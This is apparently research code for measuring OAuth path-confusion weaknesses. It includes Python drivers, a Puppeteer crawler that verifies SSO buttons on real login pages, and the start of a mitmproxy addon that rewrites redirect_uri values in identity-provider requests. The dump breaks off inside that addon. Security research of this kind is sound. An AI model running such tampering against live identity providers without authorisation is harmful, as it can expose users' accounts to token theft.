124 | Proxy_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
125 | print("proxy started")
126 |
127 | time.sleep(2)
128 | #build parameter file for crawler
129 | paramfile="paramfile.json"
130 | paramters={
131 | "site":l["loginpage"],
132 | "idp": Idp,
133 | "measurement": measurement,
134 | "idp_info":Idp_info[Idp],
135 | "xpath":s["xpath"],
136 | "name":namefile,
137 | "outpath":gen_path+"/"
138 | }
139 |
140 | #save params
141 | commands.append("parameters for crawler:")
142 | commands.append(paramters)
143 |
144 | with open(paramfile, 'w') as f:
145 | json.dump(paramters,f)
146 |
147 | #parameter file
148 | cmd=["node","Pup-Crawler.js"]
149 | cmd.append("--parameters="+paramfile)
150 |
151 | #save command
152 | commands.append("command for crawler:")
153 | commands.append(cmd)
154 | #save command used for the experiment
155 | with open(namefile+"-commands.txt", 'w') as f:
156 | for c in commands:
157 | f.write(str(c))
158 | f.write('\n')
159 |
160 | #wait to let proxy be ready
161 | time.sleep(2)
162 |
163 | #start crawler
164 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
165 | print("crawler started")
166 |
167 |                     #wait for the crawler to terminate and get the return code
168 | try:
169 | crawlresult=Crawler_subproc.wait(timeout=120 )
170 | except TimeoutExpired:
171 |                         print("crawler blocked, kill it and continue")
172 | crawlresult=Crawler_subproc.kill()
173 | print(f'print result crawler:{crawlresult}')
174 | outs=Crawler_subproc.stdout
175 | buff=outs.read()
176 | print(f'output of crawler:{buff}')
177 | #save crawler output
178 | with open(namefile+"-crawlerlog.txt", 'w') as f:
179 | f.write(buff)
180 |
181 | time.sleep(2)
182 | proxyresult = Proxy_subproc.terminate()
183 | print(f'print result PROXY:{proxyresult}')
184 | #obtain proxy log
185 | outs=Proxy_subproc.stdout
186 | buff=outs.read()
187 | print(f'output proxy:{buff}')
188 |
189 | #save mitm files
190 | with open(namefile+"-proxylog.txt", 'w') as f:
191 | f.write(buff)
192 |
193 | #move file to experiment folder
194 | try:
195 | os.rename(namefile+"-crawlerlog.txt", gen_path+"/"+namefile+"-crawlerlog.txt")
196 | os.rename(namefile+"-proxylog.txt", gen_path+"/"+namefile+"-proxylog.txt")
197 | os.rename(namefile+"-stream", gen_path+"/"+namefile+"-stream")
198 | os.rename(namefile+"-commands.txt", gen_path+"/"+namefile+"-commands.txt")
199 | except Exception as e:
200 |                         print(f'exception while moving files for this measurement, continuing: {e}')
201 |
202 |
203 | print("browser and proxy ready for next measurement")
204 | #time.sleep(90)
205 | time.sleep(30)
206 |
207 |             #change this to modify the fraction of sites in each stint
208 | if(fractionate%35==0):
209 |                 #save a snapshot of the sites analyzed and wait for the next tranche of sites
210 | print("save temporary snapshot sites analyzed")
211 | with open(gen_path+"/"+p+"-Target[temporary-snapshot].txt", 'a') as f:
212 | for s in range(len(Site_analyzed)):
213 | if s==len(Site_analyzed)-1:
214 | f.write(str(Site_analyzed[s])+"\n")
215 | else:
216 | f.write(str(Site_analyzed[s])+"\n")
217 |                 #wait 3hr between tranches of sites
218 | #time.sleep(10800)
219 | time.sleep(30)
220 |
221 | #save site analyzed
222 | print("save site analyzed")
223 | with open(gen_path+"/"+p+"-Target.txt", 'a') as f:
224 | for s in range(len(Site_analyzed)):
225 | if s==len(Site_analyzed)-1:
226 | f.write(str(Site_analyzed[s])+"\n")
227 | else:
228 | f.write(str(Site_analyzed[s])+"\n")
229 | #remove snapshot of file if present
230 | if os.path.exists(gen_path+"/"+p+"-Target[temporary-snapshot].txt"):
231 | os.remove(gen_path+"/"+p+"-Target[temporary-snapshot].txt")
232 |
233 | #wait before next pathconfusion experiment
234 |     print("wait between one path confusion vector and the next")
235 | time.sleep(30)
236 | #time.sleep(180)
237 |
--------------------------------------------------------------------------------
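
Start-PathConfusion-exp.py takes five positional arguments: the verified-sites JSON, an output folder, the path-confusion payload list, the IdP keyword file, and the IdP account/selector file. For every combination of site, login page, SSO element, and payload it starts the tampering proxy on port 7777 and then launches Pup-Crawler.js through a generated paramfile.json. An invocation sketch using the files in this repository; the output folder name is illustrative:

    python3 Start-PathConfusion-exp.py \
      Verified_Sites.json \
      results-pathconfusion \
      Pathconfusion-attacklist.json \
      idp_keywords.json \
      Idps_info.json
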
/verifysites.js:
--------------------------------------------------------------------------------
1 | const puppeteer = require('puppeteer');
2 | const FS = require('fs');
3 | const TLDJS = require('tldjs');
4 | const ArgParse = require('argparse');
5 |
6 | let WEBPAGE = null;
7 | let NameSITE = null;
8 | let TAG = null;
9 | let IDP = null;
10 | let IDP_Info = {};
11 | let XPathSSOElem=null;
12 | let newwindow=false;
13 | let measurement="";
14 |
15 | function parseArguments() {
16 | let parser = new ArgParse.ArgumentParser({
17 | add_help:true,
18 |         description: 'Verify SSO elements on login pages'
19 | });
20 |
21 | parser.add_argument(
22 | '--parameters',
23 | {
24 | action: 'store',
25 | required: true,
26 | help: 'parameters file'
27 | }
28 | );
29 |
30 | let args = parser.parse_args();
31 | PARAMETER= args.parameters;
32 | }
33 |
34 |
35 | async function Oauthurl(checkURL) {
36 |     //search for oauth keywords in the url
37 | var identifiers=["redirect_uri","oauth"];
38 | var arrayLength = identifiers.length;
39 | for (var i = 0; i < arrayLength; i++) {
40 | let res = checkURL.search(identifiers[i])
41 |         if(res >= 0){
42 | console.log("oauth keyword found in url");
43 | console.log(identifiers[i]);
44 | console.log(checkURL);
45 | return true;
46 | }
47 | }
48 | return false;
49 | }
50 |
51 | async function Save_textfile(name,content){
52 | //save file with HTML
53 | FS.writeFileSync(name,content);
54 | }
55 |
56 | (async() => {
57 | console.log("Step1 get info for the crawler");
58 | parseArguments();
59 | let rawdata = FS.readFileSync(PARAMETER);
60 | let params = JSON.parse(rawdata);
61 | WEBPAGE = params["WEBPAGE"];
62 | NameSITE = params["NameSITE"];
63 | XPathSSOElem = params["xpath"];
64 | OutputName = params["name"];
65 | OutputPath = params["outpath"];
66 | TAG=params["tag"];
67 | console.log("parameters received WEBPAGE: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s\nTAG: %s",WEBPAGE,XPathSSOElem,OutputPath,OutputName,TAG);
68 |
69 |
70 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element
71 | console.log("Step2:start the login procedure")
72 | //start browser
73 | //'--proxy-server=http://127.0.0.1:7777',
74 | const browser = await puppeteer.launch({args:['--disable-gpu',
75 | '--no-sandbox',
76 | '--disable-popup-blocking',
77 | '--disable-notifications',
78 | '--password-store=basic',
79 | '--ignore-certificate-errors'],
80 | headless: false,
81 | executablePath: '/bin/google-chrome-stable'});
82 |
83 | const page = await browser.newPage();
84 |
85 | try{
86 | await page.goto(WEBPAGE, {waitUntil: 'load'});
87 | }catch(ex){
88 |         console.log("error navigating to the login page! ABORT-EXPERIMENT:YES");
89 | await browser.close();
90 | process.exit(101);
91 | }
92 |
93 | let initial_url=page.url();
94 | //initial_url=initial_url.split("#")[0];
95 |
96 | var domainbegin = TLDJS.parse(initial_url).domain;
97 | await page.waitForTimeout(5000);
98 |
99 | //take screenshot
100 | await page.screenshot({path: OutputPath+"/"+OutputName+"_Initial.png" ,fullPage: true});
101 |
102 | //evaluate XPath
103 | try{
104 | var SSO_Elem = await page.$x(XPathSSOElem);
105 | }catch(ex){
106 | if(ex.message.includes("Evaluation failed")){
107 |             console.log("evaluation of xpath failed: xpath syntactically wrong!");
108 | await browser.close();
109 | process.exit(106);
110 | /*
111 | console.log("wrong xpath use backup procedure as selector");
112 | try{
113 | await Promise.all([page.click(XPathSSOElem),
114 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]);
115 | }catch(error){
116 | console.log("error in the click as a selector");
117 | console.log("click as a selector not working wrong xpath? check if open a new tab");
118 | }
119 | */
120 | }
121 | }
122 |
123 | if(SSO_Elem.length>0){
124 | console.log("found SSO_Elem: %s",SSO_Elem);
125 | try{
126 | var SSO_Elem = await page.$x(XPathSSOElem);
127 | console.log("SSO_Elem: %s",SSO_Elem);
128 | console.log("use the SSO_Elem to click");
129 | await Promise.all([SSO_Elem[0].click(),
130 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]);
131 | }
132 | catch{
133 |             console.log("click did not cause a redirect, check if a new window opened or stop");
134 | //means xpath not working or check new windows
135 |
136 | }
137 | }else {
138 |         console.log("the xpath element was not found, stop the experiment here");
139 | await browser.close();
140 | //return code for
141 | process.exit(107);
142 |
143 | }
144 |
145 | //gives time to obtain any new tab opened
146 | await page.waitForTimeout(3000);
147 | var Open_Pages = await browser.pages();
148 | console.log("numbers of pages after click:%s",Open_Pages.length);
149 | await page.waitForTimeout(6000);
150 |
151 | //Step3: identify new open window and take a screenshot of initial tab page after SSO click
152 | console.log("step3:identify if open new window and check oauth param in redirect url");
153 |
154 | let opentabs = Open_Pages.length;
155 | console.log("numbers of pages after click:%s",Open_Pages.length);
156 | await Open_Pages[1].screenshot({path: OutputPath+"/"+OutputName+"_AfterSSOClick.png" ,fullPage: true});
157 |
158 | if(opentabs>2){//new window case
159 |         //Step4: inspect the open tabs; if a new window's url has oauth params, the xpath was right, so collect the idp domain and close the browser
160 | try{
161 | var tabindex_IDP=-1;
162 | for (var i = 0; i < Open_Pages.length; i++) {
163 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){
164 | //check url contains oauth keywords
165 | console.log("verify that new windows url has oauth keywords");
166 | url_newwindow=Open_Pages[i].url();
167 | let test1=await Oauthurl(url_newwindow);
168 | if(test1){
169 | idp_domain=TLDJS.parse(url_newwindow).domain;
170 | //obtain domain idp and save it to file
171 | //namesite;loginpage;xpathelement;idp_domain
172 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG;
173 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content);
174 |                     console.log("Click successfully redirected to a link with oauth params");
175 | await browser.close();
176 | process.exit(104);
177 | }
178 | }
179 | }
180 |
181 | console.log("tab index after search:%s",tabindex_IDP);
182 | if (tabindex_IDP===-1){
183 | console.log("tab not found!!");
184 |             console.log("Opened a new tab but without oauth params, check xpath! ABORT-EXPERIMENT:YES");
185 | await browser.close();
186 | process.exit(103);
187 | }
188 | }catch(ex){
189 |         console.log("error in Step4, inspect this test:");
190 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem;
191 | console.log(testfailed)
192 | console.log(ex);
193 | await browser.close();
194 | process.exit(105);
195 |
196 | }
197 |
198 | }
199 | else {
200 | console.log("Step4alt: check url for presence of oauthparam");
201 | try{
202 | await page.waitForTimeout(3000);
203 | var check_url=page.url();
204 |
205 | if(check_url===initial_url){
206 | //verify differentiation between xpath not found and sso click not working
207 |             console.log("no new window and same initial url: xpath SSO click not working");
208 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES");
209 | await browser.close();
210 | process.exit(102);
211 | }
212 | else{
213 |                 //Step4alt: no new window, check if the url contains an oauth keyword and then obtain the idp domain
214 | console.log("Step4alt: check url if contains oauthparam");
215 | await page.waitForTimeout(3000);
216 | var check_url=page.url();
217 | let test= await Oauthurl(check_url);
218 | if(test){
219 | idp_domain=TLDJS.parse(check_url).domain;
220 | //obtain domain idp and save it to file
221 | //WEBPAGE;loginpage;idp;domain
222 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG;
223 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content);
224 |                     console.log("Click successful, idp url contains oauth params");
225 | await browser.close();
226 | process.exit(104);
227 | }
228 | else{
229 |                     console.log("no oauth param, check the correctness of the xpath SSO element");
230 | await browser.close();
231 | process.exit(103);
232 | }
233 | }
234 | }catch(ex){
235 |         console.log("error in Step4alt, inspect this test:");
236 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+TAG;
237 | console.log(testfailed);
238 | console.log(ex);
239 | await browser.close();
240 | process.exit(105);
241 | }
242 | }
243 |
244 | })();
245 |
--------------------------------------------------------------------------------
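
verifysites.js is normally launched by Start-SitesVerification.py, but it can be run on its own to debug a single SSO element: it reads a JSON parameter file, clicks the element identified by the XPath, and exits with one of the status codes (101-107) interpreted by the Python driver. It also assumes Chrome at the hard-coded executablePath /bin/google-chrome-stable. A standalone sketch; the parameter values are illustrative, taken from the naver.com entry in Smallsetofsites.json:

    # paramfile.json with the fields read by verifysites.js:
    #   {"WEBPAGE": "https://nid.naver.com/nidlogin.login",
    #    "NameSITE": "naver.com",
    #    "xpath": "//a/*[contains(text(), \"Facebook\")]",
    #    "name": "naver.com-test",
    #    "outpath": "verification-output",
    #    "tag": "Facebook"}
    mkdir -p verification-output
    node verifysites.js --parameters=paramfile.json
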
/Start-SitesVerification.py:
--------------------------------------------------------------------------------
1 | import subprocess
2 | from subprocess import PIPE
3 | from subprocess import TimeoutExpired
4 | import urllib.parse
5 | import re,time,json,os,sys,copy
6 | import hashlib
7 |
8 |
9 | def Identify_SSO_idp(idp,SSO):
10 | sso=[]
11 | for i in SSO:
12 | if i["provider"]==idp:
13 | sso.append(i)
14 | return sso
15 |
16 | def GenResultFolder(folder):
17 | #Path output result
18 | if not os.path.exists(folder):
19 | os.makedirs(folder)
20 | else:
21 |         print("directory already present, do not overwrite")
22 |
23 | def UpdateInfo(sites,newinfo,newsites):
24 | print(f'received this new info:{newinfo}')
25 | updatedsites=newsites.keys()
26 | info=newinfo.split("@@@@")
27 | temp={}
28 |     print(f'info after split: {info}')
29 | if(info[0] not in updatedsites):
30 | print(f'site to be updated: {info[0]}')
31 | for s in sites:
32 | if(s["site"]==info[0]):
33 | #
34 | temp=copy.deepcopy(s)
35 | break
36 | print(f'old site info:{temp}')
37 | tomodify={}
38 | #obtain SSO to be modified
39 | for l in temp["loginpages"]:
40 | if(l["loginpage"]==info[1]):
41 | for i in l["SSOs"]:
42 | try:
43 | if(i["tag"] == info[4]):
44 | tomodify=copy.deepcopy(i)
45 | except Exception as e:
46 | if(i["provider"] in info[3]):
47 | tomodify=copy.deepcopy(i)
48 |
49 | #update sso info
50 | tomodify["provider"]=info[3]
51 |
52 | #add to new sites info
53 | for l in temp["loginpages"]:
54 | if(l["loginpage"]==info[1]):
55 | print(f'len sso before:{len(l["SSOs"])}')
56 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"])
57 | #print(f'before idps:{idptempb}')
58 | l["SSOs"]=[]
59 | l["SSOs"].append(tomodify)
60 | print(f'len sso after:{len(l["SSOs"])}')
61 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"])
62 | print(f'after idps:{idptempa}')
63 |
64 | print(f'the new site info:{temp}')
65 | newsites[info[0]]=temp
66 | else:
67 | print(f'\nsite:{info[0]} already in the dictionary')
68 | save={}
69 | for s in sites:
70 | if(s["site"]==info[0]):
71 | save=copy.deepcopy(s)
72 | break
73 |
74 | print(f'get old site info:\n{save}\n \nNew info to be added to site:{newinfo}')
75 |
76 | #obtain SSO to be updated
77 | tomodify={}
78 | for l in save["loginpages"]:
79 | if(l["loginpage"]==info[1]):
80 | for i in l["SSOs"]:
81 | try:
82 | if(i["tag"] == info[4]):
83 | tomodify=copy.deepcopy(i)
84 | except Exception as e:
85 | if(i["provider"] in info[3]):
86 | tomodify=copy.deepcopy(i)
87 |
88 | #update info
89 | tomodify["provider"]=info[3]
90 |
91 | #add info to new site
92 | temp= newsites[info[0]]
93 | print(f'old site info:\n{temp}')
94 | print(f'new SSO:{tomodify}')
95 | for l in temp["loginpages"]:
96 | if(l["loginpage"]==info[1]):
97 | print(f'len sso before:{len(l["SSOs"])}')
98 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"])
99 | print(f'before idps:{idptempb}')
100 | l["SSOs"].append(tomodify)
101 | print(f'len sso after:{len(l["SSOs"])}')
102 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"])
103 | print(f'after idps:{idptempa}')
104 | print(f'the new site info:{temp}')
105 | newsites[info[0]]=temp
106 |
107 |
108 | if __name__ == "__main__":
109 | #input experiment: site and login pages
110 |     #output experiment: verified-sites file with, for each login page, the confirmed IdP and xpath, plus error reports
111 | sites = json.load(open(sys.argv[1],'r'))
112 | outputfolder=sys.argv[2]
113 |
114 |
115 | Site_analyzed=[]
116 | Nologinpage=[]
117 | NoSSOs=[]
118 | #key site and content site info
119 | updatedsites=dict()
120 | #site key and loginpage/idp value
121 | Missing_Xpath=dict()
122 | Wrong_SSOelement=dict()
123 | Syntactical_Wrong_Xpath=dict()
124 | CrawlerCrash=dict()
125 | NoActionElement=dict()
126 | EmptyResult=dict()
127 |
128 | #site key and list of loginpage as value
129 | Logingpage_unreachable=dict()
130 | start_time = time.time()
131 |
132 | GenResultFolder(outputfolder)
133 |
134 |
135 | for site in sites:
136 | if(not site['loginpages']):
137 |             print(f'Site {site["site"]} without login pages')
138 | Nologinpage.append(site["site"])
139 | continue
140 |
141 | Site_analyzed.append(site["site"])
142 | for l in site['loginpages']:
143 | #no SSO move to next login page
144 | if(len(l["SSOs"])==0):
145 | NoSSOs.append(site["site"])
146 | continue
147 |
148 | Idp_sso=l["SSOs"]
149 | for s in Idp_sso:
150 | print(f'Test idp:{s["provider"]} on site: {site["site"]} loginpage:{l["loginpage"]}')
151 |
152 | try:
153 | if("//script" in s["xpath"]):
154 | continue
155 |
156 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest()
157 | namefile=str(site['site'])+"-"+str(pagehash)
158 |
159 | except Exception as e:
160 |
161 | print("site with no xpath?")
162 | #key site and login page/idp
163 | if(site["site"] not in Missing_Xpath.keys()):
164 | Missing_Xpath[site["site"]]=[]
165 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
166 |
167 | else:
168 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
169 |
170 | continue
171 |
172 | #build parameter file for crawler
173 | paramfile="paramfile.json"
174 |
175 | paramters={
176 | "WEBPAGE":l["loginpage"],
177 | "NameSITE":site["site"],
178 | "xpath":s["xpath"],
179 | "name":namefile,
180 | "outpath":outputfolder,
181 | "tag":s["tag"]
182 | }
183 | print(f'parameters generated:{paramters}')
184 | time.sleep(2)
185 |
186 | with open(paramfile, 'w') as f:
187 | json.dump(paramters,f)
188 |
189 | #parameter file
190 | cmd=["node","verifysites.js"]
191 | cmd.append("--parameters="+paramfile)
192 |
193 | time.sleep(2)
194 | #start crawler
195 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
196 | print("crawler started")
197 | time.sleep(3)
198 |                     #wait for the crawler to terminate and get the return code
199 | crawlresult=-1
200 | try:
201 | crawlresult=Crawler_subproc.wait(timeout=120)
202 | except TimeoutExpired:
203 |                         print("crawler blocked, kill it and continue")
204 | crawlresult=Crawler_subproc.kill()
205 |
206 |                     print(f'crawler execution result (subprocess return code): {crawlresult}')
207 |
208 | outs=Crawler_subproc.stdout
209 | buff=outs.read()
210 | print(f'output of crawler:{buff}')
211 |
212 | #save crawler output
213 | with open(namefile+"-crawlerlog.txt", 'w') as f:
214 | f.write(buff)
215 |
216 | time.sleep(2)
217 | print(f'before checking crawlresult:{crawlresult}')
218 | if(crawlresult==104):
219 |                         print("crawler result successful")
220 | #update site info:
221 | with open(outputfolder+"/"+namefile+"-updateinfo.txt",'r') as f:
222 | newinfo=f.read()
223 | print(f'new info obtained by the crawler:{newinfo}')
224 |
225 | UpdateInfo(sites,newinfo,updatedsites)
226 |
227 | elif(crawlresult==102):
228 |                         print("xpath not producing any action, discard element")
229 |
230 | if(site["site"] not in NoActionElement.keys()):
231 | NoActionElement[site["site"]]=[]
232 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"])
233 | else:
234 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"])
235 |
236 |
237 |
238 | elif(crawlresult==107):
239 |                         print("xpath search failed: no element found, wrong xpath")
240 | #EmptyResult
241 | if(site["site"] not in EmptyResult.keys()):
242 | EmptyResult[site["site"]]=[]
243 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"])
244 | else:
245 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"])
246 |
247 |
248 |
249 | elif(crawlresult==106):
250 |                         print("xpath search failed: syntactically wrong xpath")
251 |
252 | if(site["site"] not in Syntactical_Wrong_Xpath.keys()):
253 | Syntactical_Wrong_Xpath[site["site"]]=[]
254 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
255 | else:
256 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
257 |
258 |
259 | elif(crawlresult==101):
260 | print(f'login page unreachable')
261 |
262 | if(site["site"] not in Logingpage_unreachable.keys()):
263 | Logingpage_unreachable[site["site"]]=[]
264 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"])
265 | else:
266 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"])
267 |
268 | elif(crawlresult==105):
269 |                         print("manually analyze this site because of a crawler error")
270 |
271 | if(site["site"] not in CrawlerCrash.keys()):
272 | CrawlerCrash[site["site"]]=[]
273 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"])
274 | else:
275 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"])
276 |
277 | elif(crawlresult==103):
278 | print("no oauth parameters in redirection link after click")
279 |
280 | if(site["site"] not in Wrong_SSOelement.keys()):
281 | Wrong_SSOelement[site["site"]]=[]
282 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"])
283 | else:
284 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"])
285 |
286 | #move file to experiment folder
287 | os.rename(namefile+"-crawlerlog.txt", outputfolder+"/"+namefile+"-crawlerlog.txt")
288 |
289 | print("browser ready for next measurement")
290 | time.sleep(2)
291 |
292 | #print new info site
293 | output_name=outputfolder+"/"+"Result-newinfo.json"
294 | File = open(output_name, "w+")
295 | File.write(json.dumps(updatedsites))
296 | File.close()
297 |
298 | with open(outputfolder+"/"+"Result-NoSSos.txt", 'w') as f:
299 | for s in range(len(NoSSOs)):
300 | f.write(str(NoSSOs[s])+"\n")
301 |
302 | with open(outputfolder+"/"+"Result-Nologinpage.txt", 'w') as f:
303 | for s in range(len(Nologinpage)):
304 | f.write(str(Nologinpage[s])+"\n")
305 |
306 | #print problem site
307 | output_name=outputfolder+"/"+"Result-Missing_Xpath.json"
308 | File = open(output_name, "w+")
309 | File.write(json.dumps(Missing_Xpath))
310 | File.close()
311 |
312 | #print problem site
313 | output_name=outputfolder+"/"+"Result-Wrong_SSOelement.json"
314 | File = open(output_name, "w+")
315 | File.write(json.dumps(Wrong_SSOelement))
316 | File.close()
317 |
318 | #print problem site
319 | output_name=outputfolder+"/"+"Result-Syntactical_Wrong_Xpath.json"
320 | File = open(output_name, "w+")
321 | File.write(json.dumps(Syntactical_Wrong_Xpath))
322 | File.close()
323 |
324 | #print crash crawler site
325 | output_name=outputfolder+"/"+"Result-CrawlerCrash.json"
326 | File = open(output_name, "w+")
327 | File.write(json.dumps(CrawlerCrash))
328 | File.close()
329 |
330 | #EmptyResult
331 | #print not oauth element
332 | output_name=outputfolder+"/"+"Result-EmptyResult.json"
333 | File = open(output_name, "w+")
334 | File.write(json.dumps(EmptyResult))
335 | File.close()
336 |
337 | #print not oauth element
338 | output_name=outputfolder+"/"+"Result-NoActionElement.json"
339 | File = open(output_name, "w+")
340 | File.write(json.dumps(NoActionElement))
341 | File.close()
342 |
343 | #print problem site
344 | output_name=outputfolder+"/"+"Result-Logingpage_unreachable.json"
345 | File = open(output_name, "w+")
346 | File.write(json.dumps(Logingpage_unreachable))
347 | File.close()
348 |
349 |
350 | save=list(updatedsites.values())
351 | print("save updated site analyzed")
352 | output_name="Verified_Sites.json"
353 | File = open(output_name, "w+")
354 | File.write(json.dumps(save))
355 | File.close()
356 |
357 | #extract top IdPs from file generated
358 | sites = json.load(open(output_name,'r'))
359 |
360 | Site_analyzed=[]
361 | IDP=dict()
362 |
363 | for site in sites:
364 | if(not site['loginpages']):
365 | continue
366 | for l in site['loginpages']:
367 | #no SSO move to next login page
368 | if(len(l["SSOs"])==0):continue
369 |
370 | for s in l["SSOs"]:
371 | if(s["provider"] not in IDP.keys()):
372 | IDP[s["provider"]]=[site["site"]]
373 | else:
374 | if(site["site"]not in IDP[s["provider"]]):
375 | IDP[s["provider"]].append(site["site"])
376 | else:
377 | continue
378 |
379 | arranged=sorted(IDP, key=lambda k: len(IDP[k]), reverse=True)
380 | for k in arranged:
381 | print(f'idp:{k}\n{IDP[k]}')
382 |     #only IdPs with more than 3 sites are considered;
383 |     #collect them into a list so that Top_Idps.json is valid JSON
384 |     top_idps=[{"idp":i,"sites":IDP[i]} for i in arranged if len(IDP[i])>3]
385 |
386 |     with open("Top_Idps.json",'w') as f:
387 |         json.dump(top_idps,f)
388 |
389 |
--------------------------------------------------------------------------------
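
Start-SitesVerification.py takes the crawled-sites JSON and an output folder, re-tests every recorded SSO element with verifysites.js, buckets failures by exit code into the Result-*.json files, and writes the confirmed elements to Verified_Sites.json plus the most common IdPs to Top_Idps.json. An invocation sketch using the small sample set shipped with the repository; the output folder name is illustrative:

    python3 Start-SitesVerification.py Smallsetofsites.json verification-output
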
/tamper_http_header-path_conf.py:
--------------------------------------------------------------------------------
1 | from mitmproxy.net.http.http1.assemble import assemble_request
2 | import sys,typing,os
3 | import urllib.parse
4 | from urllib.parse import urlparse
5 | from mitmproxy import ctx
6 | from mitmproxy import exceptions
7 | from mitmproxy import types
8 |
9 | class PathConfString:
10 | Keywords=[]
11 | LinkPrefix=[]
12 |
13 | def load(self, loader):
14 | loader.add_option(
15 | name = "inject",
16 | typespec = str,
17 | default = "",
18 | help = "Provide the pathconfusion string",
19 | )
20 |
21 | loader.add_option(
22 | name = "linkprefix0",
23 | typespec = str,
24 | default = "",
25 | help = "link prefix where to inject the path confusion",
26 | )
27 |
28 | loader.add_option(
29 | name = "linkprefix1",
30 | typespec = str,
31 | default = "",
32 | help = "link prefix where to inject the path confusion",
33 | )
34 |
35 | loader.add_option(
36 | name = "counter",
37 | typespec = int,
38 | default = 1,
39 |             help = "Define how many requests to modify",
40 | )
41 |
42 | loader.add_option(
43 | name = "keywords0",
44 | typespec = str,
45 | default = "",
46 |             help = "keyword to identify the network request to modify",
47 | )
48 |
49 | loader.add_option(
50 | name = "keywords1",
51 | typespec = str,
52 | default = "",
53 |             help = "keyword to identify the network request to modify",
54 | )
55 |
56 | loader.add_option(
57 | name = "keywords2",
58 | typespec = str,
59 | default = "",
60 |             help = "keyword to identify the network request to modify",
61 | )
62 |
63 | loader.add_option(
64 | name = "keywords3",
65 | typespec = str,
66 | default = "",
67 |             help = "keyword to identify the network request to modify",
68 | )
69 |
70 | loader.add_option(
71 | name = "keywords4",
72 | typespec = str,
73 | default = "",
74 |             help = "keyword to identify the network request to modify",
75 | )
76 |
77 | loader.add_option(
78 | name = "idphostname",
79 | typespec = str,
80 | default = "",
81 | help = "hostname of idp to be intercepted and modified",
82 | )
83 |
84 |
85 | def checkurlkeywords(self,flow):
86 | self.Keywords.append(ctx.options.keywords0)
87 | self.Keywords.append(ctx.options.keywords1)
88 | self.Keywords.append(ctx.options.keywords2)
89 | self.Keywords.append(ctx.options.keywords3)
90 | self.Keywords.append(ctx.options.keywords4)
91 |
92 | self.Keywords=list(filter(None, self.Keywords))
93 |
94 | for i in self.Keywords:
95 | if i not in flow.request.url:
96 | return False
97 |
98 | return True
99 |
100 | def checkurlprefix(self,flow):
101 | self.LinkPrefix.append(ctx.options.linkprefix0)
102 | self.LinkPrefix.append(ctx.options.linkprefix1)
103 |
104 | self.LinkPrefix=list(filter(None, self.LinkPrefix))
105 |
106 | found=False
107 | for i in self.LinkPrefix:
108 | if i in flow.request.url:
109 | found=True
110 |
111 | if found: return True
112 | return False
113 |
114 |
115 | def request(self,flow):
116 | print("inspecting request", file=sys.stdout)
117 | if ctx.options.counter<=0:return
118 |
119 | if flow.request.method.strip().upper() == 'GET':
120 | checkurl = urlparse(flow.request.url)
121 | #inspect only request with the IDP as domain
122 | if(ctx.options.idphostname in checkurl.hostname):
123 | print("request with idphostname", file=sys.stdout)
124 | #check request with the right prefix
125 | if not self.checkurlprefix(flow): return
126 |
127 | print(f'found link with rightprefix: {flow.request.url}',file=sys.stdout)
128 | #check request url with the right keywords
129 | if not self.checkurlkeywords(flow): return
130 |
131 | print("found a good candidate request to modify", file=sys.stdout)
132 |
133 | ctx.options.counter-=1
134 | if ctx.options.counter>=1:
135 | print("first matching request, ignoring it",file=sys.stdout)
136 | return
137 |
138 | multi_cmd=False
139 | if("+" in ctx.options.inject):multi_cmd=True
140 | #modify the last word, remove it, or attach the path confusion string
141 | if("mdf" in ctx.options.inject and "lw" in ctx.options.inject):
142 | #modify last word of redirect uri
143 | b=flow.request.url.find("redirect_uri")
144 | f=flow.request.url.find("&",b)
145 | if(f>0):
146 | #find next param or end of string
147 | print(f'f greater than 0 so internal param', file=sys.stdout)
148 | ret=flow.request.url[b+13:f]
149 | else:
150 | ret=flow.request.url[b+13:]
151 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
152 | #search / or %2f from end of redirect_uri
153 | cut=ret.rfind("/")
154 | if(cut<0):
155 | cut=ret.rfind('%2f')
156 | if(cut<0):
157 | cut=ret.rfind('%2F')
158 | if(cut<0):
159 | print("not able to find / or %2f or %2F",file=sys.stdout)
160 | return
161 | #modify word if larger than mod requested
162 | mod=4
163 | if(len(ret)-cut>mod):
164 | t=len(ret)-mod
165 | print(f'extracted string to capitalize: {ret[t:]}',file=sys.stdout)
